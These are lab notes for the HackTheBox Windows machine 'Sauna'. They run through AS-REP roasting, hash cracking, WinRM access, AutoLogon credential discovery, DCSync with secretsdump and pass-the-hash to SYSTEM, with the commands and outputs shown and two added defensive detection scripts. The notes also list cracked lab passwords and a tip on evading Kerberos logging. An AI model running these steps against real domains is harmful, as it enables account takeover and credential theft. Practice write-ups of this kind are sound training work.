HackTheBox · Lab
Easy · Windows · Active Directory · Kerberos

Sauna.pdf

notes

Start off with nmap

Basic scan


```shell
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49696/tcp open  unknown
```


Service/script scan on the open ports


```shell
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-27 14:12:42Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-27T14:12:45
|_  start_date: N/A
|_clock-skew: 7h00m00s
```

HTTP p80

(Screenshot: Screenshot_2025-07-27_at_9.24.19_AM.png)


Possible users?


(Screenshot: Screenshot_2025-07-27_at_9.26.13_AM.png)

SMB Anonymous Auth success

Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)

Guest access: nothing

Anon/guest share enum: nothing

LDAP Anonymous auth success

windapsearch


```shell
❯ py /root/offsec/tools/windapsearch/windapsearch.py -d $DOMAIN --dc-ip $IP -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.175
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None

[+] Enumerating all AD users

[*] Bye!
```

RPC anon auth: nothing

We collected names from the web page and turned them into candidate usernames with usernames-generator.py.

Ran kerbrute with the generated list; FSmith has Kerberos pre-authentication disabled, so kerbrute returned an AS-REP hash for that account. It is encryption type 18 (AES256, the `$18` in the hash).

$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:274c882102df475650885d34e854453d$...SNIP...

After running GetNPUsers.py we got FSmith's AS-REP hash with encryption type 23 (RC4, the `$23`)

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67a11e6a2abbed3aa5c07d94d84f71e$...SNIP...

AS-REP hash cracked with hashcat

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67...SNIP...3d:Thestrokes23
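The defender's view of the two steps above (the name-list spray with kerbrute, then the AS-REP request), as an added example that is not part of these notes: both show up in DC event 4768 when Kerberos Authentication Service auditing is on. The 4768 records are constructed and use the event's own field names; the client IP 10.10.14.5 is made up.

```python
"""Spot Kerberos user enumeration and AS-REP roast requests in DC event 4768.

Added example, not from the original notes. Runs over constructed 4768
records using the event's own field names; 10.10.14.5 is a made-up client.
"""
from collections import defaultdict

# Constructed sample: a name-list spray (0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN;
# failure audits carry PreAuthType "-" and no ticket etype), then a
# successful AS-REQ for fsmith with no pre-auth (PreAuthType 0) and an RC4
# ticket (0x17), the shape of a GetNPUsers.py request, then a normal logon.
def _ev(user, ip, status, preauth, etype):
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}

SAMPLE_4768 = [_ev(n, "10.10.14.5", "0x6", "-", "0xffffffff")
               for n in ("scoins", "hbear", "btaylor", "sdriver", "skerb", "jjoy")]
SAMPLE_4768 += [
    _ev("fsmith", "10.10.14.5", "0x0", "0", "0x17"),
    _ev("hsmith", "10.10.10.20", "0x0", "2", "0x12"),  # benign: pre-auth used, AES
]

ENUM_THRESHOLD = 5  # distinct unknown principals from one source IP

def detect_4768(events, threshold=ENUM_THRESHOLD):
    """Return (kind, source_ip, detail) findings: AS-REP roast requests and
    sources that probed at least `threshold` non-existent principals."""
    unknown_by_src = defaultdict(set)
    findings = []
    for e in events:
        status = e["Status"].lower()
        if status == "0x6":
            unknown_by_src[e["IpAddress"]].add(e["TargetUserName"].lower())
        elif status == "0x0" and e["PreAuthType"] == "0":
            # Ticket issued without pre-auth: the account has DONT_REQ_PREAUTH.
            # RC4 (0x17) on top is the etype 23 hash the notes re-requested.
            findings.append(("asrep_roast", e["IpAddress"],
                             (e["TargetUserName"], e["TicketEncryptionType"])))
    for src, names in unknown_by_src.items():
        if len(names) >= threshold:
            findings.append(("user_enum", src, len(names)))
    return findings

if __name__ == "__main__":
    for finding in detect_4768(SAMPLE_4768):
        print(finding)
```

The 0x6 failure rows only exist if Audit Kerberos Authentication Service is enabled for Failure on the DCs, which is the logging gap the Ippsec note at the end of these notes refers to.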

Authenticating as fsmith from here on

SMB user enum

```shell
Administrator
krbtgt
hsmith
fsmith
svc_loanmgr
```


shares enum


```shell
ADMIN$                          Remote Admin
C$                              Default share
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
print$          READ            Printer Drivers
RICOH Aficio SP 8300DN PCL 6 WRITE           We cant print money
SYSVOL          READ            Logon server share
```


Write perm on the RICOH share, but the directory doesn't exist.


SMB RID brute force, filtered with awk for `SidTypeUser`


```shell
Administrator
Guest
krbtgt
SAUNA$
HSmith
FSmith
svc_loanmgr
```

None of the remaining users are AS-REP roastable (pre-auth is required on them)

WinRM

```shell
❯ nxc winrm $IP -u $USER -p $PASS
[+] EGOTISTICAL-BANK.LOCAL\FSmith:Thestrokes23 (Pwn3d!)
```


```shell
❯ evil-winrm -i $IP -u $USER -p $PASS
*Evil-WinRM* PS C:\Users\FSmith\Documents>
```

PRIVESC

Uploaded `winPEASx64.exe` to the target.

```shell
╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
```

Bloodhound

(Screenshot: Screenshot_2025-07-27_at_11.22.53_AM.png)


(Screenshot: Screenshot_2025-07-27_at_11.23.24_AM.png)


Let's use secretsdump


```shell
❯ secretsdump.py $DOMAIN/$USER:$PASS@$IP -just-dc-user Administrator

...SNIP...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
```
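What the DC sees when secretsdump.py pulls hashes with `-just-dc-user`, as an added example that is not part of these notes: the request replicates secrets over the directory replication service, and with directory service access auditing enabled the DC logs event 4662 carrying the DS-Replication-Get-Changes control access rights. The 4662 records are constructed; the allowlist of DC machine accounts is an assumption.

```python
"""Flag DCSync-style replication requests in DC event 4662.

Added example, not from the original notes. secretsdump.py -just-dc-user
asks the DC to replicate account secrets over DRSUAPI; with directory
service access auditing on, the DC logs 4662 with AccessMask 0x100
(control access) and the replication rights below in Properties.
"""
import re

DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")

def _props(*guids):
    return "\n\t".join("{%s}" % g for g in guids)

# Constructed sample: the DC's own machine account replicating (normal),
# svc_loanmgr doing the same (constructed DCSync by a plain user account),
# and an unrelated attribute read with a made-up property GUID.
SAMPLE_4662 = [
    {"SubjectUserName": "SAUNA$", "SubjectDomainName": "EGOTISTICALBANK",
     "AccessMask": "0x100",
     "Properties": _props(DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL)},
    {"SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICALBANK",
     "AccessMask": "0x100",
     "Properties": _props(DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL)},
    {"SubjectUserName": "fsmith", "SubjectDomainName": "EGOTISTICALBANK",
     "AccessMask": "0x10",
     "Properties": _props("deadbeef-0000-4000-8000-000000000001")},
]

def detect_dcsync(events, dc_accounts):
    """Return (user, rights) for replication-right use by non-DC principals.
    dc_accounts: uppercase machine account names of legitimate DCs (assumed
    allowlist; anything else exercising these rights is suspect)."""
    hits = []
    for e in events:
        if e["AccessMask"].lower() != "0x100":
            continue  # only control-access rights matter here
        rights = set(GUID_RE.findall(e["Properties"].lower())) & REPL_RIGHTS
        if rights and e["SubjectUserName"].upper() not in dc_accounts:
            hits.append((e["SubjectUserName"], sorted(rights)))
    return hits

if __name__ == "__main__":
    print(detect_dcsync(SAMPLE_4662, {"SAUNA$"}))
```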

We have the Administrator NT hash

Let’s pass the hash


```shell
❯ evil-winrm -i $IP -u $USER -H $HASH
                                        
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
```

Let’s use psexec also

```shell
❯ psexec.py $DOMAIN/$USER@$IP -hashes $HASH

C:\Windows\system32> whoami
nt authority\system
```


Ippsec Notes

Kerbrute is good for brute forcing because it generates no event 4624; it produces a Kerberos failure instead, which by default is not logged.

If `nxc smb $IP -u admin -H $NTLM` comes back with (Pwn3d!), we can get NT AUTHORITY\SYSTEM with psexec.

Scope

10.10.10.175

OS

Windows 10 / Server 2019 Build 17763 x64

FQDN / DOMAIN

SAUNA.EGOTISTICAL-BANK.LOCAL

Web Technology

Windows Server IIS 10.0
html / javascript

Users

# Valid users
Administrator
krbtgt
hsmith
fsmith
svc_loanmgr

# Web page users
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven Kerb
Jenny Joy

Credentials

fsmith:Thestrokes23
svc_loanmanager:Moneymakestheworldgoround!



Logs

full_smb_spidering_2025-07-27_09-59-25.log